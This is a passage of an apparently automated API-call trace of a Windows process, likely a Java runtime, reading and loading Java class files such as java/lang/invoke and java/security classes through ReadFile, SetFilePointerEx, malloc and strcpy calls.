returned 0x12ef4a10 [0117.070] strlen (_Str="sun/reflect/UnsafeStaticObjectFieldAccessorImpl.class") returned 0x35 [0117.070] strcpy (in: _Dest=0x208cb30, _Source="sun/reflect/UnsafeStaticObjectFieldAccessorImpl.class" | out: _Dest="sun/reflect/UnsafeStaticObjectFieldAccessorImpl.class") returned="sun/reflect/UnsafeStaticObjectFieldAccessorImpl.class" [0117.070] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2692067, lpNewFilePointer=0x208c5b0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c5b0*=40444007) returned 1 [0117.070] ReadFile (in: hFile=0x134, lpBuffer=0x208c600, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208c580, lpOverlapped=0x0 | out: lpBuffer=0x208c600*, lpNumberOfBytesRead=0x208c580*=0x1e, lpOverlapped=0x0) returned 1 [0117.072] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x26920ba, lpNewFilePointer=0x208c610, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c610*=40444090) returned 1 [0117.072] ReadFile (in: hFile=0x134, lpBuffer=0x12d61fa0, nNumberOfBytesToRead=0xbba, lpNumberOfBytesRead=0x208c5e0, lpOverlapped=0x0 | out: lpBuffer=0x12d61fa0*, lpNumberOfBytesRead=0x208c5e0*=0xbba, lpOverlapped=0x0) returned 1 [0117.072] free (_Block=0x12ef4bd0) [0117.072] free (_Block=0x12e60190) [0117.120] strlen (_Str="java/lang/invoke/MethodType") returned 0x1b [0117.120] strlen (_Str="java/lang/invoke/LambdaForm") returned 0x1b [0117.121] strlen (_Str="java/lang/invoke/BoundMethodHandle") returned 0x22 [0117.168] strlen (_Str="java/lang/invoke/MethodType") returned 0x1b [0117.168] strlen (_Str="java/lang/invoke/LambdaForm") returned 0x1b [0117.169] strlen (_Str="java/lang/invoke/BoundMethodHandle") returned 0x22 [0117.262] strlen (_Str="java/lang/invoke/InnerClassLambdaMetafactory.class") returned 0x32 [0117.262] malloc (_Size=0x48) returned 0x12e60410 [0117.262] malloc (_Size=0xa0) returned 0x12dab7e0 [0117.262] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341476c, lpNewFilePointer=0x208d2b0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d2b0*=54609772) returned 1 [0117.262] ReadFile (in: hFile=0x134, lpBuffer=0x12dab7e0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208d280, lpOverlapped=0x0 | out: lpBuffer=0x12dab7e0*, lpNumberOfBytesRead=0x208d280*=0xa0, lpOverlapped=0x0) returned 1 [0117.262] malloc (_Size=0x33) returned 0x12ef4cd0 [0117.263] strlen (_Str="java/lang/invoke/InnerClassLambdaMetafactory.class") returned 0x32 [0117.263] strcpy (in: _Dest=0x208d430, _Source="java/lang/invoke/InnerClassLambdaMetafactory.class" | out: _Dest="java/lang/invoke/InnerClassLambdaMetafactory.class") returned="java/lang/invoke/InnerClassLambdaMetafactory.class" [0117.263] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3026daf, lpNewFilePointer=0x208ceb0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ceb0*=50490799) returned 1 [0117.263] ReadFile (in: hFile=0x134, lpBuffer=0x208cf00, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208ce80, lpOverlapped=0x0 | out: lpBuffer=0x208cf00*, lpNumberOfBytesRead=0x208ce80*=0x1e, lpOverlapped=0x0) returned 1 [0117.264] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3026dff, lpNewFilePointer=0x208cf10, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cf10*=50490879) returned 1 [0117.264] ReadFile (in: hFile=0x134, lpBuffer=0x12317730, nNumberOfBytesToRead=0x3103, lpNumberOfBytesRead=0x208cee0, lpOverlapped=0x0 | out: lpBuffer=0x12317730*, lpNumberOfBytesRead=0x208cee0*=0x3103, lpOverlapped=0x0) returned 1 [0117.266] free (_Block=0x12ef4a10) [0117.266] free (_Block=0x12e60640) [0117.271] strlen (_Str="java/lang/invoke/AbstractValidatingLambdaMetafactory.class") returned 0x3a [0117.271] malloc (_Size=0x48) returned 0x12e608c0 [0117.271] malloc (_Size=0xa0) returned 0x12dabe10 [0117.271] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3414704, lpNewFilePointer=0x208c870, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c870*=54609668) returned 1 [0117.271] ReadFile (in: hFile=0x134, lpBuffer=0x12dabe10, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208c840, lpOverlapped=0x0 | out: lpBuffer=0x12dabe10*, lpNumberOfBytesRead=0x208c840*=0xa0, lpOverlapped=0x0) returned 1 [0117.274] malloc (_Size=0x3b) returned 0x12e60780 [0117.274] strlen (_Str="java/lang/invoke/AbstractValidatingLambdaMetafactory.class") returned 0x3a [0117.274] strcpy (in: _Dest=0x208c9f0, _Source="java/lang/invoke/AbstractValidatingLambdaMetafactory.class" | out: _Dest="java/lang/invoke/AbstractValidatingLambdaMetafactory.class") returned="java/lang/invoke/AbstractValidatingLambdaMetafactory.class" [0117.274] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3025562, lpNewFilePointer=0x208c470, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c470*=50484578) returned 1 [0117.274] ReadFile (in: hFile=0x134, lpBuffer=0x208c4c0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208c440, lpOverlapped=0x0 | out: lpBuffer=0x208c4c0*, lpNumberOfBytesRead=0x208c440*=0x1e, lpOverlapped=0x0) returned 1 [0117.276] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x30255ba, lpNewFilePointer=0x208c4d0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c4d0*=50484666) returned 1 [0117.276] ReadFile (in: hFile=0x134, lpBuffer=0x1231aa30, nNumberOfBytesToRead=0x17f5, lpNumberOfBytesRead=0x208c4a0, lpOverlapped=0x0 | out: lpBuffer=0x1231aa30*, lpNumberOfBytesRead=0x208c4a0*=0x17f5, lpOverlapped=0x0) returned 1 [0117.276] free (_Block=0x12ef4cd0) [0117.277] free (_Block=0x12e60410) [0117.291] strlen (_Str="java/util/PropertyPermission.class") returned 0x22 [0117.291] malloc (_Size=0x48) returned 0x12e60960 [0117.292] malloc (_Size=0xa0) returned 0x12daafa0 [0117.292] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x34146b4, lpNewFilePointer=0x208cc70, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cc70*=54609588) returned 1 [0117.292] ReadFile (in: hFile=0x134, lpBuffer=0x12daafa0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208cc40, lpOverlapped=0x0 | out: lpBuffer=0x12daafa0*, lpNumberOfBytesRead=0x208cc40*=0xa0, lpOverlapped=0x0) returned 1 [0117.292] malloc (_Size=0x23) returned 0x12e66eb0 [0117.293] strlen (_Str="java/util/PropertyPermission.class") returned 0x22 [0117.293] strcpy (in: _Dest=0x208cdf0, _Source="java/util/PropertyPermission.class" | out: _Dest="java/util/PropertyPermission.class") returned="java/util/PropertyPermission.class" [0117.293] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3024a0d, lpNewFilePointer=0x208c870, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c870*=50481677) returned 1 [0117.293] ReadFile (in: hFile=0x134, lpBuffer=0x208c8c0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208c840, lpOverlapped=0x0 | out: lpBuffer=0x208c8c0*, lpNumberOfBytesRead=0x208c840*=0x1e, lpOverlapped=0x0) returned 1 [0117.295] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3024a4d, lpNewFilePointer=0x208c8d0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c8d0*=50481741) returned 1 [0117.295] ReadFile (in: hFile=0x134, lpBuffer=0x12317730, nNumberOfBytesToRead=0xb15, lpNumberOfBytesRead=0x208c8a0, lpOverlapped=0x0 | out: lpBuffer=0x12317730*, lpNumberOfBytesRead=0x208c8a0*=0xb15, lpOverlapped=0x0) returned 1 [0117.296] free (_Block=0x12e60780) [0117.296] free (_Block=0x12e608c0) [0117.299] malloc (_Size=0x48) returned 0x12e60690 [0117.299] malloc (_Size=0xa0) returned 0x12dac5a0 [0117.299] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3414660, lpNewFilePointer=0x208cb30, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cb30*=54609504) returned 1 [0117.299] ReadFile (in: hFile=0x134, lpBuffer=0x12dac5a0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208cb00, lpOverlapped=0x0 | out: lpBuffer=0x12dac5a0*, lpNumberOfBytesRead=0x208cb00*=0xa0, lpOverlapped=0x0) returned 1 [0117.300] malloc (_Size=0x27) returned 0x12e66820 [0117.300] strlen (_Str="java/security/AccessController$1.class") returned 0x26 [0117.300] strcpy (in: _Dest=0x208ccb0, _Source="java/security/AccessController$1.class" | out: _Dest="java/security/AccessController$1.class") returned="java/security/AccessController$1.class" [0117.300] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x30246ec, lpNewFilePointer=0x208c730, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c730*=50480876) returned 1 [0117.300] ReadFile (in: hFile=0x134, lpBuffer=0x208c780, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208c700, lpOverlapped=0x0 | out: lpBuffer=0x208c780*, lpNumberOfBytesRead=0x208c700*=0x1e, lpOverlapped=0x0) returned 1 [0117.301] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3024730, lpNewFilePointer=0x208c790, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c790*=50480944) returned 1 [0117.301] ReadFile (in: hFile=0x134, lpBuffer=0x12317730, nNumberOfBytesToRead=0x2dd, lpNumberOfBytesRead=0x208c760, lpOverlapped=0x0 | out: lpBuffer=0x12317730*, lpNumberOfBytesRead=0x208c760*=0x2dd, lpOverlapped=0x0) returned 1 [0117.302] free (_Block=0x12e66eb0) [0117.302] free (_Block=0x12e60960) [0117.308] strlen (_Str="sun/security/util/SecurityConstants.class") returned 0x29 [0117.308] malloc (_Size=0x48) returned 0x12e602d0 [0117.308] malloc (_Size=0xa0) returned 0x12dab9f0 [0117.308] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3414609, lpNewFilePointer=0x208bd20, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208bd20*=54609417) returned 1 [0117.308] ReadFile (in: hFile=0x134, lpBuffer=0x12dab9f0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208bcf0, lpOverlapped=0x0 | out: lpBuffer=0x12dab9f0*, lpNumberOfBytesRead=0x208bcf0*=0xa0, lpOverlapped=0x0) returned 1 [0117.309] malloc (_Size=0x2a) returned 0x12ef46d0 [0117.309] strlen (_Str="sun/security/util/SecurityConstants.class") returned 0x29 [0117.309] strcpy (in: _Dest=0x208bea0, _Source="sun/security/util/SecurityConstants.class" | out: _Dest="sun/security/util/SecurityConstants.class") returned="sun/security/util/SecurityConstants.class" [0117.309] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3023b19, lpNewFilePointer=0x208b920, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b920*=50477849) returned 1 [0117.309] ReadFile (in: hFile=0x134, lpBuffer=0x208b970, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208b8f0, lpOverlapped=0x0 | out: lpBuffer=0x208b970*, lpNumberOfBytesRead=0x208b8f0*=0x1e, lpOverlapped=0x0) returned 1 [0117.311] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3023b60, lpNewFilePointer=0x208b980, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b980*=50477920) returned 1 [0117.311] ReadFile (in: hFile=0x134, lpBuffer=0x12317730, nNumberOfBytesToRead=0xb8c, lpNumberOfBytesRead=0x208b950, lpOverlapped=0x0 | out: lpBuffer=0x12317730*, lpNumberOfBytesRead=0x208b950*=0xb8c, lpOverlapped=0x0) returned 1 [0117.311] free (_Block=0x12e66820) [0117.312] free (_Block=0x12e60690) [0117.319] strlen (_Str="java/net/NetPermission.class") returned 0x1c [0117.320] malloc (_Size=0x48) returned 0x12e60190 [0117.320] malloc (_Size=0xa0) returned 0x12dac4f0 [0117.320] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x34145bf, lpNewFilePointer=0x208b540, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b540*=54609343) returned 1 [0117.320] ReadFile (in: hFile=0x134, lpBuffer=0x12dac4f0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208b510, lpOverlapped=0x0 | out: lpBuffer=0x12dac4f0*, lpNumberOfBytesRead=0x208b510*=0xa0, lpOverlapped=0x0) returned 1 [0117.320] malloc (_Size=0x1d) returned 0x12e66d30 [0117.321] strlen (_Str="java/net/NetPermission.class") returned 0x1c [0117.321] strcpy (in: _Dest=0x208b6c0, _Source="java/net/NetPermission.class" | out: _Dest="java/net/NetPermission.class") returned="java/net/NetPermission.class" [0117.321] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x30239a1, lpNewFilePointer=0x208b140, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b140*=50477473) returned 1 [0117.321] ReadFile (in: hFile=0x134, lpBuffer=0x208b190, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208b110, lpOverlapped=0x0 | out: lpBuffer=0x208b190*, lpNumberOfBytesRead=0x208b110*=0x1e, lpOverlapped=0x0) returned 1 [0117.322] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x30239db, lpNewFilePointer=0x208b1a0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b1a0*=50477531) returned 1 [0117.322] ReadFile (in: hFile=0x134, lpBuffer=0x20fe980, nNumberOfBytesToRead=0x13e, lpNumberOfBytesRead=0x208b170, lpOverlapped=0x0 | out: lpBuffer=0x20fe980*, lpNumberOfBytesRead=0x208b170*=0x13e, lpOverlapped=0x0) returned 1 [0117.323] free (_Block=0x12ef46d0) [0117.323] free (_Block=0x12e602d0) [0117.330] strlen (_Str="java/security/SecurityPermission.class") returned 0x26 [0117.330] malloc (_Size=0x48) returned 0x12e60b90 [0117.331] malloc (_Size=0xa0) returned 0x12dab7e0 [0117.331] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341456b, lpNewFilePointer=0x208b540, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b540*=54609259) returned 1 [0117.331] ReadFile (in: hFile=0x134, lpBuffer=0x12dab7e0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208b510, lpOverlapped=0x0 | out: lpBuffer=0x12dab7e0*, lpNumberOfBytesRead=0x208b510*=0xa0, lpOverlapped=0x0) returned 1 [0117.332] malloc (_Size=0x27) returned 0x12e662e0 [0117.332] strlen (_Str="java/security/SecurityPermission.class") returned 0x26 [0117.332] strcpy (in: _Dest=0x208b6c0, _Source="java/security/SecurityPermission.class" | out: _Dest="java/security/SecurityPermission.class") returned="java/security/SecurityPermission.class" [0117.332] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3023815, lpNewFilePointer=0x208b140, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b140*=50477077) returned 1 [0117.332] ReadFile (in: hFile=0x134, lpBuffer=0x208b190, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208b110, lpOverlapped=0x0 | out: lpBuffer=0x208b190*, lpNumberOfBytesRead=0x208b110*=0x1e, lpOverlapped=0x0) returned 1 [0117.333] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3023859, lpNewFilePointer=0x208b1a0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b1a0*=50477145) returned 1 [0117.333] ReadFile (in: hFile=0x134, lpBuffer=0x20fe9b0, nNumberOfBytesToRead=0x148, lpNumberOfBytesRead=0x208b170, lpOverlapped=0x0 | out: lpBuffer=0x20fe9b0*, lpNumberOfBytesRead=0x208b170*=0x148, lpOverlapped=0x0) returned 1 [0117.333] free (_Block=0x12e66d30) [0117.334] free (_Block=0x12e60190) [0117.337] malloc (_Size=0x48) returned 0x12e60190 [0117.337] malloc (_Size=0xa0) returned 0x12dab890 [0117.337] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341451e, lpNewFilePointer=0x208b540, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b540*=54609182) returned 1 [0117.338] ReadFile (in: hFile=0x134, lpBuffer=0x12dab890, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208b510, lpOverlapped=0x0 | out: lpBuffer=0x12dab890*, lpNumberOfBytesRead=0x208b510*=0xa0, lpOverlapped=0x0) returned 1 [0117.338] malloc (_Size=0x20) returned 0x12e66b80 [0117.339] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3020bf3, lpNewFilePointer=0x208b140, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b140*=50465779) returned 1 [0117.339] ReadFile (in: hFile=0x134, lpBuffer=0x208b190, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208b110, lpOverlapped=0x0 | out: lpBuffer=0x208b190*, lpNumberOfBytesRead=0x208b110*=0x1e, lpOverlapped=0x0) returned 1 [0117.340] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3020c30, lpNewFilePointer=0x208b1a0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b1a0*=50465840) returned 1 [0117.340] ReadFile (in: hFile=0x134, lpBuffer=0x12317730, nNumberOfBytesToRead=0x2be5, lpNumberOfBytesRead=0x208b170, lpOverlapped=0x0 | out: lpBuffer=0x12317730*, lpNumberOfBytesRead=0x208b170*=0x2be5, lpOverlapped=0x0) returned 1 [0117.344] strlen (_Str="java/security/AllPermissionCollection.class") returned 0x2b [0117.344] malloc (_Size=0x48) returned 0x12e60820 [0117.344] malloc (_Size=0xa0) returned 0x12dabd60 [0117.344] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341446d, lpNewFilePointer=0x208bd10, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208bd10*=54609005) returned 1 [0117.344] ReadFile (in: hFile=0x134, lpBuffer=0x12dabd60, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208bce0, lpOverlapped=0x0 | out: lpBuffer=0x12dabd60*, lpNumberOfBytesRead=0x208bce0*=0xa0, lpOverlapped=0x0) returned 1 [0117.346] malloc (_Size=0x2c) returned 0x12ef5110 [0117.346] strlen (_Str="java/security/AllPermissionCollection.class") returned 0x2b [0117.346] strcpy (in: _Dest=0x208be90, _Source="java/security/AllPermissionCollection.class" | out: _Dest="java/security/AllPermissionCollection.class") returned="java/security/AllPermissionCollection.class" [0117.346] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x30203af, lpNewFilePointer=0x208b910, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b910*=50463663) returned 1 [0117.346] ReadFile (in: hFile=0x134, lpBuffer=0x208b960, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208b8e0, lpOverlapped=0x0 | out: lpBuffer=0x208b960*, lpNumberOfBytesRead=0x208b8e0*=0x1e, lpOverlapped=0x0) returned 1 [0117.347] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x30203f8, lpNewFilePointer=0x208b970, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b970*=50463736) returned 1 [0117.347] ReadFile (in: hFile=0x134, lpBuffer=0x12317730, nNumberOfBytesToRead=0x554, lpNumberOfBytesRead=0x208b940, lpOverlapped=0x0 | out: lpBuffer=0x12317730*, lpNumberOfBytesRead=0x208b940*=0x554, lpOverlapped=0x0) returned 1 [0117.348] free (_Block=0x12e66b80) [0117.348] free (_Block=0x12e60190) [0117.354] strlen (_Str="java/lang/invoke/InfoFromMemberName.class") returned 0x29 [0117.354] malloc (_Size=0x48) returned 0x12e60c80 [0117.354] malloc (_Size=0xa0) returned 0x12dac390 [0117.354] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3414416, lpNewFilePointer=0x208d0b0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d0b0*=54608918) returned 1 [0117.354] ReadFile (in: hFile=0x134, lpBuffer=0x12dac390, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208d080, lpOverlapped=0x0 | out: lpBuffer=0x12dac390*, lpNumberOfBytesRead=0x208d080*=0xa0, lpOverlapped=0x0) returned 1 [0117.356] malloc (_Size=0x2a) returned 0x12ef48d0 [0117.356] strlen (_Str="java/lang/invoke/InfoFromMemberName.class") returned 0x29 [0117.356] strcpy (in: _Dest=0x208d230, _Source="java/lang/invoke/InfoFromMemberName.class" | out: _Dest="java/lang/invoke/InfoFromMemberName.class") returned="java/lang/invoke/InfoFromMemberName.class" [0117.356] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x301f2a2, lpNewFilePointer=0x208ccb0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ccb0*=50459298) returned 1 [0117.356] ReadFile (in: hFile=0x134, lpBuffer=0x208cd00, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208cc80, lpOverlapped=0x0 | out: lpBuffer=0x208cd00*, lpNumberOfBytesRead=0x208cc80*=0x1e, lpOverlapped=0x0) returned 1 [0117.370] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x301f2e9, lpNewFilePointer=0x208cd10, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd10*=50459369) returned 1 [0117.370] ReadFile (in: hFile=0x134, lpBuffer=0x12317730, nNumberOfBytesToRead=0x10c6, lpNumberOfBytesRead=0x208cce0, lpOverlapped=0x0 | out: lpBuffer=0x12317730*, lpNumberOfBytesRead=0x208cce0*=0x10c6, lpOverlapped=0x0) returned 1 [0117.371] free (_Block=0x12ef5110) [0117.371] free (_Block=0x12e60820) [0117.373] strlen (_Str="java/lang/invoke/MethodHandleInfo.class") returned 0x27 [0117.373] malloc (_Size=0x48) returned 0x12e60780 [0117.373] malloc (_Size=0xa0) returned 0x12dac2e0 [0117.373] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x34143c1, lpNewFilePointer=0x208c5f0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c5f0*=54608833) returned 1 [0117.373] ReadFile (in: hFile=0x134, lpBuffer=0x12dac2e0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208c5c0, lpOverlapped=0x0 | out: lpBuffer=0x12dac2e0*, lpNumberOfBytesRead=0x208c5c0*=0xa0, lpOverlapped=0x0) returned 1 [0117.374] malloc (_Size=0x28) returned 0x12e66760 [0117.374] strlen (_Str="java/lang/invoke/MethodHandleInfo.class") returned 0x27 [0117.374] strcpy (in: _Dest=0x208c770, _Source="java/lang/invoke/MethodHandleInfo.class" | out: _Dest="java/lang/invoke/MethodHandleInfo.class") returned="java/lang/invoke/MethodHandleInfo.class" [0117.375] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x301e94d, lpNewFilePointer=0x208c1f0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c1f0*=50456909) returned 1 [0117.375] ReadFile (in: hFile=0x134, lpBuffer=0x208c240, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208c1c0, lpOverlapped=0x0 | out: lpBuffer=0x208c240*, lpNumberOfBytesRead=0x208c1c0*=0x1e, lpOverlapped=0x0) returned 1 [0117.377] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x301e992, lpNewFilePointer=0x208c250, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c250*=50456978) returned 1 [0117.377] ReadFile (in: hFile=0x134, lpBuffer=0x123189c0, nNumberOfBytesToRead=0x910, lpNumberOfBytesRead=0x208c220, lpOverlapped=0x0 | out: lpBuffer=0x123189c0*, lpNumberOfBytesRead=0x208c220*=0x910, lpOverlapped=0x0) returned 1 [0117.378] free (_Block=0x12ef48d0) [0117.378] free (_Block=0x12e60c80) [0117.404] strlen (_Str="java/lang/invoke/InnerClassLambdaMetafactory$ForwardingMethodGenerator.class") returned 0x4c [0117.404] malloc (_Size=0x48) returned 0x12e60870 [0117.404] malloc (_Size=0xa0) returned 0x12dac2e0 [0117.404] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3414347, lpNewFilePointer=0x208d1b0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d1b0*=54608711) returned 1 [0117.404] ReadFile (in: hFile=0x134, lpBuffer=0x12dac2e0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208d180, lpOverlapped=0x0 | out: lpBuffer=0x12dac2e0*, lpNumberOfBytesRead=0x208d180*=0xa0, lpOverlapped=0x0) returned 1 [0117.405] malloc (_Size=0x4d) returned 0x13061280 [0117.406] strlen (_Str="java/lang/invoke/InnerClassLambdaMetafactory$ForwardingMethodGenerator.class") returned 0x4c [0117.406] strcpy (in: _Dest=0x208d330, _Source="java/lang/invoke/InnerClassLambdaMetafactory$ForwardingMethodGenerator.class" | out: _Dest="java/lang/invoke/InnerClassLambdaMetafactory$ForwardingMethodGenerator.class") returned="java/lang/invoke/InnerClassLambdaMetafactory$ForwardingMethodGenerator.class" [0117.406] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x301dd5f, lpNewFilePointer=0x208cdb0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cdb0*=50453855) returned 1 [0117.406] ReadFile (in: hFile=0x134, lpBuffer=0x208ce00, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208cd80, lpOverlapped=0x0 | out: lpBuffer=0x208ce00*, lpNumberOfBytesRead=0x208cd80*=0x1e, lpOverlapped=0x0) returned 1 [0117.408] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x301ddc9, lpNewFilePointer=0x208ce10, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ce10*=50453961) returned 1 [0117.408] ReadFile (in: hFile=0x134, lpBuffer=0x12317730, nNumberOfBytesToRead=0xb84, lpNumberOfBytesRead=0x208cde0, lpOverlapped=0x0 | out: lpBuffer=0x12317730*, lpNumberOfBytesRead=0x208cde0*=0xb84, lpOverlapped=0x0) returned 1 [0117.409] free (_Block=0x12e66760) [0117.409] free (_Block=0x12e60780) [0117.411] strlen (_Str="java/lang/invoke/TypeConvertingMethodAdapter.class") returned 0x32 [0117.411] malloc (_Size=0x48) returned 0x12e60460 [0117.411] malloc (_Size=0xa0) returned 0x12dabd60 [0117.411] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x34142e7, lpNewFilePointer=0x208c770, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c770*=54608615) returned 1 [0117.411] ReadFile (in: hFile=0x134, lpBuffer=0x12dabd60, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208c740, lpOverlapped=0x0 | out: lpBuffer=0x12dabd60*, lpNumberOfBytesRead=0x208c740*=0xa0, lpOverlapped=0x0) returned 1 [0117.412] malloc (_Size=0x33) returned 0x12ef5510 [0117.413] strlen (_Str="java/lang/invoke/TypeConvertingMethodAdapter.class") returned 0x32 [0117.413] strcpy (in: _Dest=0x208c8f0, _Source="java/lang/invoke/TypeConvertingMethodAdapter.class" | out: _Dest="java/lang/invoke/TypeConvertingMethodAdapter.class") returned="java/lang/invoke/TypeConvertingMethodAdapter.class" [0117.413] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x301c750, lpNewFilePointer=0x208c370, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c370*=50448208) returned 1 [0117.413] ReadFile (in: hFile=0x134, lpBuffer=0x208c3c0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208c340, lpOverlapped=0x0 | out: lpBuffer=0x208c3c0*, lpNumberOfBytesRead=0x208c340*=0x1e, lpOverlapped=0x0) returned 1 [0117.415] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x301c7a0, lpNewFilePointer=0x208c3d0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c3d0*=50448288) returned 1 [0117.415] ReadFile (in: hFile=0x134, lpBuffer=0x12318490, nNumberOfBytesToRead=0x15bf, lpNumberOfBytesRead=0x208c3a0, lpOverlapped=0x0 | out: lpBuffer=0x12318490*, lpNumberOfBytesRead=0x208c3a0*=0x15bf, lpOverlapped=0x0) returned 1 [0117.415] free (_Block=0x13061280) [0117.415] free (_Block=0x12e60870) [0117.441] strlen (_Str="java/security/cert/TrustAnchor.class") returned 0x24 [0117.441] malloc (_Size=0x48) returned 0x12e60190 [0117.441] malloc (_Size=0xa0) returned 0x12dac700 [0117.442] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3333b85, lpNewFilePointer=0x208e060, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e060*=53689221) returned 1 [0117.442] ReadFile (in: hFile=0x134, lpBuffer=0x12dac700, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208e030, lpOverlapped=0x0 | out: lpBuffer=0x12dac700*, lpNumberOfBytesRead=0x208e030*=0xa0, lpOverlapped=0x0) returned 1 [0117.443] malloc (_Size=0x25) returned 0x12e667c0 [0117.444] strlen (_Str="java/security/cert/TrustAnchor.class") returned 0x24 [0117.444] strcpy (in: _Dest=0x208e1e0, _Source="java/security/cert/TrustAnchor.class" | out: _Dest="java/security/cert/TrustAnchor.class") returned="java/security/cert/TrustAnchor.class" [0117.444] SetFilePointerEx (in: hFile=0x134, 